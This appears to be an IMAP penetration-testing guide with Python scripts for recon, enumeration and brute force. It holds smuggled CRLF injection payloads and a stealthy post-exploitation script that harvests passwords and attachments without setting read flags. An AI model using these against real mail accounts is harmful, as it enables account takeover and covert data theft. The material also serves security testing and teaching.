
IMAP (Internet Message Access Protocol)

Default Ports: 143 (cleartext, may offer STARTTLS), 993 (IMAP over TLS from the first byte, often called IMAPS)

IMAP (Internet Message Access Protocol, RFC 3501) is the protocol email clients use to read and manage messages held on a mail server over TCP. Unlike POP3, which downloads messages to the client and usually deletes them from the server, IMAP keeps the messages and their state (read/unread flags, folders) on the server, so several clients can work on the same mailbox and only the parts a client needs (headers, a single body part) are transferred.

IMAP is a client-server protocol: the client opens a connection, authenticates, selects a mailbox and then issues commands to search, fetch, flag, move or delete messages. Every client command is prefixed with a client-chosen tag (a1, a2, ...), and the server answers with zero or more untagged lines starting with "*" followed by one line carrying that tag and OK, NO or BAD. That tag is what lets a client tell which reply belongs to which command, and a command sent without one is rejected with BAD.

Connect

Connect Using Telnet

Telnet only works against the cleartext port (143). Port 993 is wrapped in TLS, so you need a TLS-aware client such as openssl s_client or ncat --ssl there instead.

  1. Open a terminal window.
  2. Type the following command:
telnet <server-ip> <port>
  3. Once connected, the server sends a greeting line beginning with "* OK". You can then type IMAP commands directly into the session; prefix each one with a tag (any short string such as a1, a2, ...), because the server replies with untagged "*" lines followed by a line carrying your tag and OK, NO or BAD, and rejects untagged commands with BAD.

Connect Using Email Clients

Popular email clients like Outlook, Thunderbird, and Apple Mail support IMAP for retrieving email messages. To connect to an IMAP server using an email client, you typically need to provide the server address, port number, username, and password.

Recon

Identifying an IMAP Server

Use Nmap to find open IMAP ports and grab the service banner (-sV):

nmap -sV -p 143,993 <target-ip>

On port 143 you can also connect with Telnet and read the greeting line, which often names the server software and sometimes its version (Dovecot, Courier, Exchange, ...). After the greeting, a tagged CAPABILITY command (a1 CAPABILITY) lists the supported extensions and authentication mechanisms, for example STARTTLS, AUTH=PLAIN or LOGINDISABLED (which means the server refuses cleartext LOGIN until TLS is established). Port 993 speaks TLS immediately, so Telnet shows nothing useful there; use openssl s_client or ncat --ssl instead.

telnet <server-ip> <port>
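The connection and recon steps above, as an added Python example that is not part of the original page: it opens a raw session (TCP on 143, TLS on 993), reads the greeting banner, sends a tagged CAPABILITY command and reports whether LOGIN is still accepted without TLS. The host and port are placeholders you pass on the command line; the parsing helpers are exercised on a constructed server transcript so they can be checked offline.

```python
"""Added example, not part of the original page: open a raw IMAP session,
read the greeting banner, send a tagged CAPABILITY command and report whether
the server still accepts cleartext LOGIN. The host and port are placeholders;
the response helpers are exercised on a constructed server transcript."""
import io
import socket
import ssl


def reader_from_bytes(data):
    """Wrap constructed server output so it reads like sock.makefile('rb')."""
    return io.BytesIO(data)


def read_response(reader, tag):
    """Collect server lines up to and including the tagged completion line.

    A reply consists of untagged lines ("* ...") followed by exactly one line
    that starts with the client's tag: "a1 OK ...", "a1 NO ..." or "a1 BAD ...".
    """
    lines = []
    while True:
        raw = reader.readline()
        if not raw:
            raise ConnectionError("server closed the connection before the tagged reply")
        line = raw.decode("utf-8", "replace").rstrip("\r\n")
        lines.append(line)
        if line.startswith(tag + " "):
            return lines


def parse_capabilities(lines):
    """Extract capability tokens from a "* CAPABILITY ..." line or from a
    greeting that embeds them, e.g. "* OK [CAPABILITY IMAP4rev1 STARTTLS] ready"."""
    for line in lines:
        if line.startswith("* CAPABILITY "):
            return line.split()[2:]
        if "[CAPABILITY " in line:
            return line.split("[CAPABILITY ", 1)[1].split("]", 1)[0].split()
    return []


def cleartext_login_possible(caps):
    """LOGINDISABLED (RFC 2595/3501) means the server refuses LOGIN until TLS is
    up; without it, credentials typed on port 143 travel in the clear."""
    return "LOGINDISABLED" not in caps


def connect(host, port, timeout=10):
    """TCP for 143, implicit TLS for 993. Certificate checks are disabled because a
    recon target frequently has a self-signed or mismatched certificate."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if port == 993:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    return sock


def probe(host, port):
    """Do what the manual telnet session does, but with proper tags and TLS."""
    sock = connect(host, port)
    reader = sock.makefile("rb")
    banner = reader.readline().decode("utf-8", "replace").rstrip("\r\n")
    print("banner:      ", banner)
    sock.sendall(b"a1 CAPABILITY\r\n")
    caps = parse_capabilities(read_response(reader, "a1")) or parse_capabilities([banner])
    print("capabilities:", " ".join(caps))
    if port != 993 and cleartext_login_possible(caps):
        print("finding: LOGIN accepted before STARTTLS (cleartext credentials)")
    sock.sendall(b"a2 LOGOUT\r\n")
    read_response(reader, "a2")
    sock.close()
    return banner, caps


# Constructed transcripts, in the shape a Dovecot-style server produces.
SAMPLE_BANNER = "* OK [CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED] Dovecot ready."
SAMPLE_CAPABILITY_REPLY = (b"* CAPABILITY IMAP4rev1 STARTTLS AUTH=PLAIN AUTH=LOGIN\r\n"
                           b"a1 OK Capability completed.\r\n")

if __name__ == "__main__":
    import sys
    probe(sys.argv[1], int(sys.argv[2]))   # e.g. python3 imap_probe.py 10.0.0.5 143
```

Run it once against 143 and once against 993: the 143 run tells you whether a password sent by a careless client would cross the wire unencrypted, and the capability list tells you which authentication mechanisms the brute-force tools below can actually use.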

Enumeration

Enumerating Mailboxes

Listing mailboxes requires an authenticated session, so log in first (the tags a1, a2, ... are arbitrary; LOGIN sends the password in cleartext unless the connection is already under TLS). LIST with an empty reference name and the pattern "*" returns every mailbox together with its attributes (\HasChildren, \Noselect, ...) and the hierarchy delimiter:

a1 LOGIN <username> <password>
a2 LIST "" "*"

Enumerating Email Headers

FETCH only works inside a selected mailbox, so SELECT one first (EXAMINE opens it read-only). Use BODY.PEEK rather than BODY so the fetch does not set the \Seen flag and turn unread mail into read mail in front of the owner. Message 1 is the oldest message; a range such as 1:* covers the whole mailbox:

a3 SELECT INBOX
a4 FETCH 1 BODY.PEEK[HEADER.FIELDS (FROM TO SUBJECT DATE)]
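The same enumeration done from Python's standard imaplib, as an added example that is not part of the original page: it upgrades to STARTTLS when offered, logs in, lists every mailbox and peeks at the headers of the newest messages, with parsers for the LIST reply and for the header block that FETCH returns. The host, port and credentials are placeholders; the parsers are checked against constructed server output so they run offline.

```python
"""Added example, not part of the original page: an imaplib session that logs
in, lists mailboxes and fetches header fields, plus parsers for the LIST and
header replies. Credentials and host are placeholders; the parsers are
checked against constructed server output so they run offline."""
import imaplib
import re

# One LIST reply line looks like:  (\HasNoChildren) "/" "Projects/Q3 Budget"
LIST_RE = re.compile(
    r'^\((?P<flags>[^)]*)\)\s+(?P<delim>"[^"]*"|NIL)\s+'
    r'(?P<name>"(?:[^"\\]|\\.)*"|\S+)$'
)


def parse_list_line(line):
    """Turn one LIST response (bytes or str) into flags, delimiter and name."""
    if isinstance(line, bytes):
        line = line.decode("utf-8", "replace")
    m = LIST_RE.match(line)
    if not m:
        raise ValueError(f"unparseable LIST response: {line!r}")
    delim, name = m.group("delim"), m.group("name")
    if name.startswith('"'):                       # quoted: strip and unescape
        name = name[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return {
        "flags": m.group("flags").split(),
        "delimiter": None if delim == "NIL" else delim.strip('"'),
        "name": name,
    }


def parse_header_fields(raw):
    """Parse the literal returned for BODY[HEADER.FIELDS (...)] into a dict,
    unfolding RFC 5322 continuation lines (leading space or tab)."""
    headers, current = {}, None
    for line in raw.decode("utf-8", "replace").splitlines():
        if not line:
            continue
        if line[0] in " \t" and current:
            headers[current] += " " + line.strip()
        else:
            name, _, value = line.partition(":")
            current = name.strip()
            headers[current] = value.strip()
    return headers


def headers_from_fetch_data(data):
    """imaplib returns FETCH data as [(b'1 (BODY[...] {n}', b'<literal>'), b')', ...];
    pull the literal out of every tuple."""
    return [parse_header_fields(item[1]) for item in data if isinstance(item, tuple)]


def enumerate_mailbox(host, port, user, password, last_n=5):
    """LOGIN, LIST every mailbox, then peek at the headers of the newest messages."""
    conn = imaplib.IMAP4_SSL(host, port) if port == 993 else imaplib.IMAP4(host, port)
    try:
        if port != 993 and "STARTTLS" in conn.capabilities:
            conn.starttls()                        # upgrade before sending a password
        conn.login(user, password)
        typ, data = conn.list('""', '*')
        boxes = [parse_list_line(line) for line in data if line]
        for box in boxes:
            print(f"{box['name']:32} flags={' '.join(box['flags'])}")
        typ, data = conn.select("INBOX", readonly=True)   # read-only: no flag changes
        count = int(data[0])
        print(f"INBOX: {count} messages")
        if count:
            first = max(1, count - last_n + 1)
            typ, data = conn.fetch(f"{first}:{count}",
                                   "(BODY.PEEK[HEADER.FIELDS (FROM TO SUBJECT DATE)])")
            for h in headers_from_fetch_data(data):   # PEEK leaves \Seen untouched
                print(h.get("Date"), "|", h.get("From"), "|", h.get("Subject"))
        return boxes
    finally:
        conn.logout()


# Constructed server output for the offline checks.
SAMPLE_LIST_LINES = [
    b'(\\HasNoChildren) "/" "INBOX"',
    b'(\\HasChildren \\Noselect) "/" "Projects"',
    b'(\\HasNoChildren) "/" "Projects/Q3 Budget"',
]
SAMPLE_HEADER_BLOCK = (b"From: Alice <alice@example.test>\r\n"
                       b"To: bob@example.test\r\n"
                       b"Subject: Re: VPN credentials for the\r\n"
                       b" contractor account\r\n"
                       b"Date: Mon, 03 Jun 2024 09:12:44 +0000\r\n\r\n")
```

Two details matter operationally: readonly=True makes imaplib send EXAMINE instead of SELECT, and BODY.PEEK keeps the server from setting \Seen, so nothing in the owner's client changes while you look. A \Noselect mailbox (like "Projects" above) is a container only and will fail on SELECT.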

Attack Vectors

Brute Force Attacks

Brute force and password-spraying attacks against IMAP guess usernames and passwords; Hydra and Nmap's imap-brute script both support it. Keep in mind that the mail server logs every failed attempt (and fail2ban-style tooling acts on those logs), that lockout policies can lock out real users, and that IMAP authentication is usually backed by the same directory as other services, so a valid pair often works elsewhere too. Against port 993 the tool must speak TLS.

Hydra Example

hydra -L users.txt -P passwords.txt imap://<server-ip>

Add -S (TLS) together with -s 993 for the IMAPS port; -f stops after the first valid pair and -t limits the number of parallel connections so you are less likely to trip lockouts.

Nmap Example

nmap --script imap-brute -p 143,993 <target-ip>

Without arguments the script uses Nmap's built-in username and password lists; pass your own with --script-args userdb=users.txt,passdb=passwords.txt.

IMAP Injection

IMAP injection is an application-layer issue rather than a flaw in the IMAP server itself: a webmail or mail-gateway application builds IMAP commands from user-supplied values (mailbox names, search terms, message identifiers) and concatenates them into the command string without escaping. Because IMAP commands are terminated by CRLF and string arguments are delimited by double quotes, an input containing a quote followed by CRLF can close the intended command and append further commands that run inside the application's authenticated session, for example listing or reading other folders; even without a newline, a stray quote can smuggle extra search keys that change what the application returns. The fix is to encode every argument as an IMAP quoted string (escaping backslash and double quote) or as a length-prefixed literal, and to reject CR and LF outright.
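The injection described above, as an added Python example that is not part of the original page: a webmail-style SEARCH built by string concatenation next to the same command built with proper IMAP quoting, and a view of what the server would receive in each case. The function names and the attacker inputs are illustrative constructions.

```python
"""Added example, not part of the original page: a webmail-style SEARCH built by
string concatenation, the same command built with proper IMAP quoting, and a
view of what the server would receive in each case. Names are illustrative."""
CRLF = "\r\n"


def build_search_vulnerable(tag, user_term):
    """Unsafe: the user's term is pasted into a quoted string as-is. A term that
    contains a double quote and CRLF closes the string, ends the command and
    appends new commands that the server executes in the app's session."""
    return f'{tag} SEARCH SUBJECT "{user_term}"{CRLF}'


def imap_quote(value):
    """Encode value as an IMAP quoted string (RFC 3501 section 4.3).
    Quoted strings may not carry CR, LF or NUL and must escape backslash and
    double quote; non-ASCII text would need a {n} literal instead, so it is
    rejected here rather than silently mangled."""
    if any(ch in value for ch in "\r\n\0"):
        raise ValueError("CR/LF/NUL not allowed in an IMAP quoted string")
    if not value.isascii():
        raise ValueError("non-ASCII value needs a literal, not a quoted string")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_search_safe(tag, user_term):
    """Hardened: the term always ends up as exactly one quoted-string argument."""
    return f"{tag} SEARCH SUBJECT {imap_quote(user_term)}{CRLF}"


def try_build_safe(tag, user_term):
    """Convenience wrapper: None when the input was rejected."""
    try:
        return build_search_safe(tag, user_term)
    except ValueError:
        return None


def commands_on_wire(stream):
    """Split the byte stream as the server sees it: one command per CRLF."""
    return [c for c in stream.split(CRLF) if c]


# Constructed attacker inputs.
CRLF_PAYLOAD = 'invoice"\r\nA002 LIST "" "*"\r\nA003 SEARCH SUBJECT "x'
KEY_PAYLOAD = 'x" FROM "ceo'      # no newline, but smuggles a second search key

if __name__ == "__main__":
    for term in (CRLF_PAYLOAD, KEY_PAYLOAD):
        print("vulnerable:", commands_on_wire(build_search_vulnerable("A001", term)))
        print("safe:      ", commands_on_wire(try_build_safe("A001", term) or ""))
```

With CRLF_PAYLOAD the vulnerable builder hands the server three commands instead of one, the middle one enumerating every mailbox with the application's credentials; the hardened builder refuses the input. With KEY_PAYLOAD there is no newline, but the unescaped quote turns one SUBJECT key into SUBJECT plus FROM, silently changing the query, while the quoted form keeps the whole string as a single argument.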

Man-in-the-Middle (MitM) Attacks

MitM attacks matter for IMAP because credentials and message bodies cross the wire in cleartext on port 143 unless STARTTLS is negotiated, and because many clients historically accepted any certificate. An attacker on the path can capture a LOGIN or AUTH=PLAIN exchange, strip the STARTTLS capability from the server's greeting so a client that does not insist on TLS never upgrades, or present a forged certificate to a client that does not verify it, and can then read or alter every message that passes through. On the server side, advertising LOGINDISABLED until TLS is established and serving port 993 with a valid certificate removes the cleartext path; on the client side, requiring TLS and verifying the certificate does the same.

Post-Exploitation

Email Extraction

After gaining access to an email account via IMAP, an attacker can search the mailbox (SEARCH TEXT "password", SEARCH FROM "hr", and so on) and download the matching messages and attachments to harvest credentials, financial data, password-reset links for other services, or confidential documents. Opening the mailbox read-only and fetching with BODY.PEEK keeps the \Seen flags untouched, so nothing in the owner's client changes.
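The extraction step above, as an added Python example that is not part of the original page: after a successful login it searches a mailbox for keywords, downloads the matching messages without touching their flags, and pulls out attachment names and password-looking strings from each one. The host, credentials and keyword list are placeholders; the message summariser is checked offline on a constructed message.

```python
"""Added example, not part of the original page: after a successful login,
search a mailbox for keywords, download the matching messages without touching
their flags, and pull out attachments and credential-looking strings. Host,
credentials and keyword list are placeholders; summarize_message() is checked
offline on a constructed message."""
import email
import imaplib
import re
from email import policy

KEYWORDS = ("password", "invoice", "vpn")            # illustrative search terms
SECRET_RE = re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*\S+")


def search_messages(conn, keywords):
    """One SEARCH TEXT per keyword (search keys are ANDed, so separate searches
    are simpler than nesting OR) and the union of matching sequence numbers."""
    found = set()
    for kw in keywords:
        typ, data = conn.search(None, "TEXT", f'"{kw}"')   # keywords are trusted constants
        if typ == "OK" and data and data[0]:
            found.update(int(n) for n in data[0].split())
    return sorted(found)


def summarize_message(raw_bytes):
    """Parse one RFC 822 message: sender, subject, attachment names and any
    password-looking strings in the plain-text body."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    return {
        "from": str(msg["from"]),
        "subject": str(msg["subject"]),
        "attachments": [p.get_filename() for p in msg.iter_attachments()],
        "secrets": SECRET_RE.findall(text),
    }


def extract_mailbox(host, port, user, password, mailbox="INBOX", keywords=KEYWORDS):
    """Download every message matching the keywords, leaving the Seen flags as they were."""
    conn = imaplib.IMAP4_SSL(host, port) if port == 993 else imaplib.IMAP4(host, port)
    try:
        conn.login(user, password)
        conn.select(mailbox, readonly=True)          # EXAMINE semantics: no flag changes
        results = []
        for num in search_messages(conn, keywords):
            typ, data = conn.fetch(str(num), "(BODY.PEEK[])")   # PEEK: do not set \Seen
            raw = next(item[1] for item in data if isinstance(item, tuple))
            summary = summarize_message(raw)
            print(num, summary["from"], "|", summary["subject"],
                  "| attachments:", summary["attachments"], "| secrets:", summary["secrets"])
            results.append(summary)
        return results
    finally:
        conn.logout()


# Constructed message in the form FETCH BODY.PEEK[] returns it.
SAMPLE_MESSAGE = (
    b"From: it-helpdesk@example.test\r\n"
    b"To: bob@example.test\r\n"
    b"Subject: VPN access\r\n"
    b"Date: Mon, 03 Jun 2024 09:12:44 +0000\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="b1"\r\n'
    b"\r\n"
    b"--b1\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"\r\n"
    b"Hi Bob, your temporary VPN password: Spring2024! Please change it on first use.\r\n"
    b"--b1\r\n"
    b'Content-Type: application/pdf; name="vpn-guide.pdf"\r\n'
    b'Content-Disposition: attachment; filename="vpn-guide.pdf"\r\n'
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"JVBERi0xLjQK\r\n"
    b"--b1--\r\n"
)
```

SEARCH TEXT matches headers and body on the server side, so only the hits are downloaded; the regular expression is deliberately loose, because on a real mailbox the false positives are cheap to skim and the misses are what you cannot afford.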

Email Manipulation

Attackers can manipulate messages through IMAP itself: delete them (STORE +FLAGS \Deleted followed by EXPUNGE), move them into rarely checked folders, or use APPEND to plant a crafted message in a folder so it looks as if it had been received. IMAP has no command to edit a message in place, so "modifying" a message means appending an altered copy and deleting the original; forwarding a message to someone else goes out through SMTP, not IMAP.

Email Forwarding

Persistent forwarding is the classic follow-on: a rule that copies every incoming message to an attacker-controlled address, giving ongoing visibility into the victim's communications without further logins. IMAP itself has no rule mechanism, so this is done through whatever the mail platform offers, typically Sieve scripts via ManageSieve (port 4190) on Dovecot-style servers or inbox rules in the webmail or Exchange interface, usually with the same credentials. The rule keeps working after the attacker's session ends and often after a password reset, so reviewing forwarding rules and Sieve scripts is a standard step when responding to a mailbox compromise.